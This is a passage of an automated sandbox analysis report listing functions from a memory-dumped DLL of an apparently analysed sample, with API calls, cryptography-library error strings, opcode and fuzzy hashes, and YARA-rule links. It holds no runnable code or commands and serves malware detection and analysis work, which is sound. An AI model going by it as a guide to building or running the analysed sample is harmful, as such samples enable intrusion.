                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6F08B50D
                                                                                                            • Part of subcall function 6F091AA0: __87except.LIBCMT ref: 6F091ADB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                          • String ID: pow
                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                          • Opcode ID: eb24aa259cf6ca7ad16639b68f83423d48af717e3d73d4d5607f4f0cbe73b0f5
                                                                                                          • Instruction ID: 6d52d238108f4f0736e62f9a8a547e725da60397c4807f35439241ba0f147e8e
                                                                                                          • Opcode Fuzzy Hash: eb24aa259cf6ca7ad16639b68f83423d48af717e3d73d4d5607f4f0cbe73b0f5
                                                                                                          • Instruction Fuzzy Hash: E55180F0B0C602C6CF016718C6013AE7BE9DF41714FA0AD59E4F5472D5FF389495AA46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F038560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __cftoe.LIBCMT ref: 6F0388ED
                                                                                                            • Part of subcall function 6F08A116: __mbstowcs_s_l.LIBCMT ref: 6F08A12C
                                                                                                          • __cftoe.LIBCMT ref: 6F038911
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe$__mbstowcs_s_l
                                                                                                          • String ID: zX$P
                                                                                                          • API String ID: 1494777130-2079734279
                                                                                                          • Opcode ID: e36209f90c0dfffb62f9d189bb37720f802d1bd86794853407a5583d851a63d5
                                                                                                          • Instruction ID: 7bf98b1a4671e40513b131caafa1b733629a4af72c5762634d3925660a1659eb
                                                                                                          • Opcode Fuzzy Hash: e36209f90c0dfffb62f9d189bb37720f802d1bd86794853407a5583d851a63d5
                                                                                                          • Instruction Fuzzy Hash: 969111B11087819FC376CF15C980BABBBE8FB89714F504A1DE19D8B280DB716645CF92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0589D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F058ABB
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F058B82
                                                                                                          Strings
                                                                                                          • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6F058A8E
                                                                                                          • : invalid ciphertext, xrefs: 6F058B48
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                                                                                          • API String ID: 2005118841-483996327
                                                                                                          • Opcode ID: 7e4f52481ea4178b66da6232a00851bb9df26730441dde367b79b0831fbd8dd2
                                                                                                          • Instruction ID: 97cea6d6c7b40be991ced2af118c8594fb0357c4f27616e292119da64c2659a8
                                                                                                          • Opcode Fuzzy Hash: 7e4f52481ea4178b66da6232a00851bb9df26730441dde367b79b0831fbd8dd2
                                                                                                          • Instruction Fuzzy Hash: 44512DB51187409FD324CF54C990FABB7E8EF88708F004A1DE99A97691DB71F909CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F02F190 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024760: __CxxThrowException@8.LIBCMT ref: 6F0247F9
                                                                                                            • Part of subcall function 6F058D80: _malloc.LIBCMT ref: 6F058D8A
                                                                                                            • Part of subcall function 6F058D80: _malloc.LIBCMT ref: 6F058DAF
                                                                                                          • _memcpy_s.LIBCMT ref: 6F02F282
                                                                                                          • _memset.LIBCMT ref: 6F02F293
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                                                                                          • String ID: @$\|o
                                                                                                          • API String ID: 3081897325-1896453990
                                                                                                          • Opcode ID: 3a14aee89ca69504d7c980b52815a771a44305adb7e1df652b18bb07c73ecf24
                                                                                                          • Instruction ID: 9f9fab6e1f53055877009fe628607d0e679516c162b07ec72b142e5ddc134540
                                                                                                          • Opcode Fuzzy Hash: 3a14aee89ca69504d7c980b52815a771a44305adb7e1df652b18bb07c73ecf24
                                                                                                          • Instruction Fuzzy Hash: 9E519F75904348DFDB20CFA4C980BDEBBB4BF45308F108199D8596B381DBB56A48CFA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F024E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024EFC
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024F16
                                                                                                          • _memmove.LIBCMT ref: 6F024F6C
                                                                                                            • Part of subcall function 6F024D90: std::_Xinvalid_argument.LIBCPMT ref: 6F024DA9
                                                                                                            • Part of subcall function 6F024D90: std::_Xinvalid_argument.LIBCPMT ref: 6F024DCA
                                                                                                            • Part of subcall function 6F024D90: std::_Xinvalid_argument.LIBCPMT ref: 6F024DE5
                                                                                                            • Part of subcall function 6F024D90: _memmove.LIBCMT ref: 6F024E4D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                          • String ID: string too long
                                                                                                          • API String ID: 2168136238-2556327735
                                                                                                          • Opcode ID: 2f6ed5a6dcf63d64793d6cc44ea8e3da523e7cc2744f12c0bea87ed083b94f36
                                                                                                          • Instruction ID: 673953a4599fbb35c809be1623cf8381f96eb32e899a519c9115a8ada55c559c
                                                                                                          • Opcode Fuzzy Hash: 2f6ed5a6dcf63d64793d6cc44ea8e3da523e7cc2744f12c0bea87ed083b94f36
                                                                                                          • Instruction Fuzzy Hash: 9F310A36310610ABE724DE5CE880B6EF7EAFFD5620760492FE555CB682C771A84487B1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F022090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F02211F
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F024067
                                                                                                            • Part of subcall function 6F024010: _memmove.LIBCMT ref: 6F0240C8
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0221BF
                                                                                                          Strings
                                                                                                          • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6F0220BD
                                                                                                          • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6F02215D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                                          • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                                                                                          • API String ID: 1902190269-1268710280
                                                                                                          • Opcode ID: 5b4ec9c212471eca11c63b84f81cfc506ef4c8f79adbf204010018ee170ab76f
                                                                                                          • Instruction ID: 5509e93a3037511759206c0787d4e71aa91f391939159d55d8f7c0060e2ae007
                                                                                                          • Opcode Fuzzy Hash: 5b4ec9c212471eca11c63b84f81cfc506ef4c8f79adbf204010018ee170ab76f
                                                                                                          • Instruction Fuzzy Hash: F5412774C0428CFADB14DFE8D880BEEFBB8BB19314F50426AE425A7691DB755608CF60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F024850 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0248E9
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0248FE
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F0249C0: std::exception::exception.LIBCMT ref: 6F0249EF
                                                                                                            • Part of subcall function 6F0249C0: __CxxThrowException@8.LIBCMT ref: 6F024A04
                                                                                                          • _memmove.LIBCMT ref: 6F024945
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 163498487-2241063504
                                                                                                          • Opcode ID: c2dd63c236c9345ce91a6dc2c94c7c5d526c3bdb1a8f741abdc07e72d28e6144
                                                                                                          • Instruction ID: 69d77c9dedf2f551812bc16370a166716d9f07c1d2c0c70ec5e8ee7eb195983f
                                                                                                          • Opcode Fuzzy Hash: c2dd63c236c9345ce91a6dc2c94c7c5d526c3bdb1a8f741abdc07e72d28e6144
                                                                                                          • Instruction Fuzzy Hash: 90419F75D10645BBDB04CFA8C89079EBBF4FB09264F50422AE826A77C1D775A940CBF1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F021D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F021DC9
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F024067
                                                                                                            • Part of subcall function 6F024010: _memmove.LIBCMT ref: 6F0240C8
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F021E74
                                                                                                          Strings
                                                                                                          • BufferedTransformation: this object is not attachable, xrefs: 6F021D67
                                                                                                          • CryptoMaterial: this object contains invalid values, xrefs: 6F021E16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                                          • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                                                                                          • API String ID: 1902190269-3853263434
                                                                                                          • Opcode ID: 6bcb83f7d7d8594bd93ced3ebcb60e793583cb4ad8776078e6539bcb5cee23cf
                                                                                                          • Instruction ID: 2eb156fa57872cf0f250c9cc0a5a120463ec4387fa24f736e6d9f81d00af3d4b
                                                                                                          • Opcode Fuzzy Hash: 6bcb83f7d7d8594bd93ced3ebcb60e793583cb4ad8776078e6539bcb5cee23cf
                                                                                                          • Instruction Fuzzy Hash: EC411974C04248AFCB14DFE9D880BDEFBB8BB19314F50826AE825A7695DB755604CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0574C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F07D820: _memmove.LIBCMT ref: 6F07D930
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05761A
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                                                                                          • API String ID: 39012651-1139078987
                                                                                                          • Opcode ID: 01569ce4b2284b0dd7907e67e03cd5f548f218f8f9b42f444fea98c677db12ff
                                                                                                          • Instruction ID: 2162655d713c8b125592a3d06d7ea0e5cc5ad25b8ec7b9dac155e7c884e74fb5
                                                                                                          • Opcode Fuzzy Hash: 01569ce4b2284b0dd7907e67e03cd5f548f218f8f9b42f444fea98c677db12ff
                                                                                                          • Instruction Fuzzy Hash: DE4170751083C1ABD334CB54C844FDBBBE8BBD9318F104A5DE59993281DB7551088BA7
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F05BF2D
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                          • String ID: gfff$gfff$vector<T> too long
                                                                                                          • API String ID: 1823113695-3369487235
                                                                                                          • Opcode ID: 115d4932c304e13ea9f53771a1a0d65fd5597a56f632b5b6f6de3c26bff0405d
                                                                                                          • Instruction ID: e4ec6f05ecc35037ab02bb68567003e5bb7cc5288259c9addf3ce9c734cdc63c
                                                                                                          • Opcode Fuzzy Hash: 115d4932c304e13ea9f53771a1a0d65fd5597a56f632b5b6f6de3c26bff0405d
                                                                                                          • Instruction Fuzzy Hash: 5431C3B1A046099FC718CF59D980F6AF7E9FB88714F14862DE9599B380DB71B900CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F088F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(F6D10407,F6D10407,?,00000000), ref: 6F088F7F
                                                                                                          • GetLastError.KERNEL32(0000000A,?,00000000), ref: 6F088F8F
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F089014
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          • Timer: QueryPerformanceCounter failed with error , xrefs: 6F088FA5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
